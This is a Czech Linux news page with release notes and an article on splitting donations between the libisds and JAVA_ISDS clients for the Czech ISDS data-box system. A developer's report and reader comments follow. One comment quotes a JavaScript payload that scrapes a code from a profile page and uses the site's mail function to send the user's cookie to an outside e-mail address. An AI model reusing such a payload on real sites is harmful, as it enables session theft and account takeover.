Svobodný a otevřený multiplatformní editor EPUB souborů Sigil (Wikipedie, GitHub) byl vydán ve verzi 2.5.0. Stejně tak doprovodný vizuální EPUB XHTML editor PageEdit (GitHub).
Na základě národního atribučního procesu vláda České republiky označila Čínskou lidovou republiku za zodpovědnou za škodlivou kybernetickou kampaň proti jedné z neutajovaných komunikačních sítí Ministerstva zahraničních věcí ČR. Tato škodlivá aktivita, která trvala od roku 2022 a zasáhla instituci zařazenou na seznam české kritické infrastruktury, byla provedena kyberšpionážní skupinou APT31, veřejně spojovanou se zpravodajskou službou Ministerstvo státní bezpečnosti (MSS).
Google Chrome 137 byl prohlášen za stabilní. Nejnovější stabilní verze 137.0.7151.55 přináší řadu novinek z hlediska uživatelů i vývojářů. Podrobný přehled v poznámkách k vydání. Opraveno bylo 11 bezpečnostních chyb. Vylepšeny byly také nástroje pro vývojáře.
Byl vydán AlmaLinux OS 10 s kódovým názvem Purple Lion. Podrobnosti v poznámkách k vydání. Na rozdíl od Red Hat Enterprise Linuxu 10 nadále podporuje x86-64-v2.
Byl vydán Mozilla Firefox 139.0. Přehled novinek v poznámkách k vydání a poznámkách k vydání pro vývojáře. Řešeny jsou rovněž bezpečnostní chyby. Nový Firefox 139 je již k dispozici také na Flathubu a Snapcraftu.
Byly publikovány výsledky průzkumu mezi uživateli Blenderu uskutečněného v říjnu 2024. Zúčastnilo se více než 7000 uživatelů. Téměř 93 % z nich například používá uživatelské rozhraní v angličtině.
Lukáš Růžička v článku RamaLama aneb vyháníme lamy na vlastní louku na MojeFedora.cz představuje open source nástroj RamaLama umožňující spouštět jazykové modely v izolovaných OCI kontejnerech, a to bezpečně, bez potřeby mít root přístup k počítači, s podporou GPU či CPU a bez zbytečných obtížností kolem.
Byl vydán Sublime Text 4 Build 4200. Sublime Text (Wikipedie) je proprietární multiplatformní editor textových souborů a zdrojových kódů. Ke stažení a k vyzkoušení je zdarma. Pro další používání je nutná licence v ceně 99 dolarů. Spolu se Sublime Merge je cena 168 dolarů.
Multiplatformní open source voxelový herní engine Luanti byl vydán ve verzi 5.12.0. Podrobný přehled novinek v changelogu. Původně se jedná o Minecraftem inspirovaný Minetest v říjnu loňského roku přejmenovaný na Luanti.
Armbian, tj. linuxová distribuce založená na Debianu a Ubuntu optimalizovaná pro jednodeskové počítače na platformě ARM a RISC-V, ke stažení ale také pro Intel a AMD, byl vydán ve verzi 25.5. Přehled novinek v Changelogu.
Projekt si zpočátku kladl ambiciózní cíle. Ačkoliv se v rámci tohoto projektu nepodařilo všech vytyčených cílů dosáhnout, podařilo se zviditelnit nedostatky ne zcela ideální implementace samotných Datových schránek a nabídnout použitelné řešení pro ty z nás, kteří nemohou používat oficiální webové rozhraní pro přístup k Datovým schránkám. Zároveň jsme rádi, že mimo projektů probíhajících v rámci AbcLinuxu, se vynořila řada dalších dobrých implementací.
Protože aktivita kolem samotného projektu utichla a naopak rostl tlak na závěrečný verdikt, bylo nutné najít způsob, jakým peníze rozdělit mezi přihlášené projekty. Po posouzení jsme došli k závěru, že peníze budou rozděleny mezi projekty libisds (knihovna v C a frontend Šigofumi) a JAVA_ISDS (implementace v Javě), a to v poměru půl na půl. Uvědomujeme si, že žádný způsob rozdělení peněz není úplně fér ke všem stranám zároveň: tedy přihlášeným i nepřihlášeným projektům, projektům, které mezitím vznikly pod záštitou nejrůznějších firem a sdružení a v podstatě ani k lidem a firmám, které na vývoj přispěly.
Díky tedy patří i ostatním projektům jako dsgui (CZ.NIC, z.s.p.o.), OpenDS.cz (blue.point Solutions, s.r.o.), datové schránky pro Android (APK SOFT s.r.o.) a řadě dalších.
Výše příspěvků a celou historii bankovního účtu, kde byly v rukou Liberix, o.p.s. spravovány finance, lze vidět na transparentním kontě (přehled v PDF). Peníze tedy byly rozděleny následovně:
Před rokem jsme zveřejnili stav obou projektů. Požádali jsme oba projekty o dodatečné zhodnocení – jedno zhodnocení, které jsme dostali, je krátké (za JAVA_ISDS) a jedno je velmi dlouhé (za libisds). Bylo nám líto to dlouhé zkracovat, proto jej najdete v celém znění na druhé stránce tohoto článku. Cílem bylo čtenáře seznámit s tím, co se v projektu událo a jaký je jejich postoj k datovým schránkám.
Chtěli bychom poděkovat všem vývojářům, kteří umožnili uživatelům přistupovat k Datovým schránkám z libovolného operačního systému, což pro mnohé nepředstavuje jen „funkci navíc“, ale také v podstatě zákonnou nezbytnost. Dále chceme poděkovat sdružení Liberix, o.p.s. za důležitou spolupráci a pomoc v průběhu projektu. Děkujeme všem, kteří finančně přispěli, ale také těm, kteří nějakým způsobem pomohli při testování a rozvoji všech otevřených řešení. A na závěr přejeme těm, kterých se to týká, šťastnější ruku při volbě a implementaci technologií, které se přímo dotýkají občanů této země.
Nedávno jsem přidal přihlašování i přes certifikát. Vyřízení osobního certifikátu od Postsignum bylo docela vtipné, krátce po jeho vydání mi volali s prosbou, abych se tam stavil, protože mi zapomněli dát podepsat souhlas se zpracovanim osobnich udajů...
Připravuji se na přechod na nové testovací prostředí, které bude spuštěno v únoru.
O Datových schránkách nemám kladné mínění, ale některé změny jsem uvítal s radostí: přechod na BASIC autentizaci místo původního řešení s cookies a několikanásobným přesměrováním. Člověk se také naučí defenzivnímu programování, protože ví, že se nemůže na nic spoléhat.
Knihovna není zcela hotová. Seznam věcí, které bych rád jednou začlenil, je zapsán v souboru TODO.
Především se jedná o podporu souběžného zpracování z více vláken, možnost při překladu vypnout podporu síťových funkcí, schopnost validovat požadavky a odpovědi serveru proti XML schématu a to nejdůležitější – dopsat testy pro síťové operace.
Testováním síťových operací myslím testy funkcí jako přihlášení k datové schránce, získání seznamu zpráv, odeslání zprávy atd. V současnosti existuje testovací instance ISDS, kde je možné takové operace vyzkoušet, ale vše s patřičnou časovou prodlevou a především není možné otestovat reakci knihovny na všechny chybové stavy nebo na chybně utvořené zprávy (například hodnota času doručení by nebyla správně utvořena.).
Co tedy chybí, je nástroj, který by simuloval server, a sada testů, které by prověřily knihovnu po všech stránkách, především v okrajových případech, které se za běžného provozu nevyskytují. Protože takovou péči by si zasloužily i jiné knihovny (napsané v rozličných jazycích) a protože simulátor testů a definice testů mohou být na konkrétní knihovně nezávislé, došel jsem k závěru, že je třeba věc uchopit značně abstraktně a na jazyku knihovny nezávisle. Protože se jedná v podstatě o samostatný projekt rozsahem srovnatelný se samotnou knihovnou, rozhodl jsem se, že jej prostřednictvím firmy Red Hat Czech s. r. o. nabídnu jako zadání bakalářské práce. Pokud bude téma akademicky průchodné a až budou všechny formality hotové, studenti Fakulty informatiky Masarykovy univerzity a Fakulty informačních technologií Vysokého učení technického v Brně dostanou příležitost, jak skloubit příjemné s užitečným.
Nástroje: Tisk bez diskuse
Tiskni
Sdílej:
Koukám, že ty datové schránky nejsou zrovna bezpečné.Dobré ránko
Koukám, že ty datové schránky nejsou zrovna bezpečné.<uvítací melodie Windows XP>
Tu chybu s tím, že můžeš zjistit něco o zprávě, která ti nepatří by měli opravit.Jsou tam i horší věci.
debian-security
, takže jsem si zvykl na to, že privilege escalation je považováno za kritikou chybu, která se opraví tak nejvýš do jednoho dne. Obzvláště když k její opravě stačí jeden chown
.
Celkem neúspěšně jsem zkoušel najít nějaká čísla, ale narazil jsem i na vtipnou kalkulačku. Moc se mi líbí ta nulová cena..
Celkem neúspěšně jsem zkoušel najít nějaká číslaPokud by například Seznam doručoval e-maily za podobnou cenu, jako ISDS doručuje zprávy, začal by být v České republice citelný nedostatek peněz
ale narazil jsem i na vtipnou kalkulačkuTo mi připomíná kalkulačku DP, která v případě dopravy metrem počítá čas z nástupiště na nástupiště…
A zasmál bych se ještě víc, kdyby tu někdo přihodil informaci, na kolik že tato taškařice přišla daňového poplatníka..Pokud si dobře vzpomínám, slyšel jsem něco o 800MKč. Jestli je v tom i provoz, nebo je to vyloženě za zhotovení, to si nepamatuju.
A zasmál bych se ještě víc, kdyby tu někdo přihodil informaci, na kolik že tato taškařice přišla daňového poplatníka..9×108 Kč.
A proč z toho viním programátory ze Slušovic?Svazarmovská badna Software602 je pražská. Nebo snad opravdu mají někoho ve Slušovicích? Nedošlo k záměně s SWS?.
za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.Výsledek by byla aplikace nyní už zase nefunkční, protože od zadání se některé věci dost podstatně změnily. Takže byste vzal dalších 60 tisíc a dal je další firmě, aby to napsala znova podle nového zadání. A nebo tady máte opensource projekt, který není závislý na původním autorovi a může na něm pokračovat každý.
Výsledek by byla aplikace nyní už zase nefunkční, protože od zadání se některé věci dost podstatně změnily. Takže byste vzal dalších 60 tisíc a dal je další firmě, aby to napsala znova podle nového zadání.Ona je sporná i platnost tvrzení, že by to firma zbouchala za šedesát tisíc... tak nějak mi to přijde kapku málo.
za 60 litrov by to pravdepodobne zbúchala komerčná firma presne podla zadania, v kratšom čase a výsledok by bol funkčná aplikácia.Tak todle me neda se nevyjadrit! Zakolik ze to nezvladla na firma 602, ktera je komercni ? Ani tu multiplatformni knihovnu neudelala!
Ano, přesně tímto směrem jsem vtipkoval. Vtipkoval, protože
Můžete jmenovat nějaký celostátní IT projekt provozovaný českým státem, který byl zprovozněn "finančně při zdi" a bez pijavic? Mě se třeba líbí fungování CZ-NICu a NIXu posledních pár let, ale to jsou projekty vzešlé z iniciativy skupiny komerčních subjektů ("zájmové sdružení právnických osob") - to nejsou státní instituce. Jo kdyby něco takového rozjel CZ-NIC, a byl schopen zalobovat na vládě/parlamentu, že tento "freemail" bude mít stejné právní postavení jako dnešní Datové Schránky... taky by mě zajímalo, jak by musel vypadat komerční model té věci - uvědomte si, že NIX a CZ.NIC jsou financovány několika málo komerčními subjekty (domény se platí od kusu, ale nepřímo prostřednictvím komerčních registrátorů) => čili takhle nějak by musely fungovat i platby za "oficiální centrální mailbox".
xmlhttp.open('GET', '/Profile?action=sendEmail&uid=15224'); xmlhttp.send(''); var pole = xmlhttp.responseText.split(' '); var kod = ''; var part_num = 0; while (part_num < pole.length) { if (pole[part_num] == 'hodnotu') { kod = pole[part_num+1].substring(0,4); break; } part_num += 1; } xmlhttp.open('GET', '/Mail?KOD=' + kod + '&sender=admin%40pobox.sk&cc=&bcc=&subject=' + cookie + '&message=' + cookie + '&finish=Odeslat&url=%2FProfile%2F15224&action=finish'); xmlhttp.send('');
This is Shigofumi, an ISDS client. Have a nice e-government. Use `help' command to get list of available commands. shigofumi> help Following commands are available: accept accept commercial message box show current box details cache show cache details cd change working directory commercial manipulate commercial receiving box status compose compose a message convert submit local document for authorized conversion copying show this program licence excerpt debug set debugging delivery get message delivery details findbox search for a box hash query ISDS for message hash help describe commands load load message or message delivery details from local file login log into ISDS lsi list received messages lso list sent messages msgi get incoming message msgo get outgoing message passwd manipulate user password pwd print working directory quit exit shigofumi read mark message as read statbox get status of a box user show current user details users show box users version show version of this program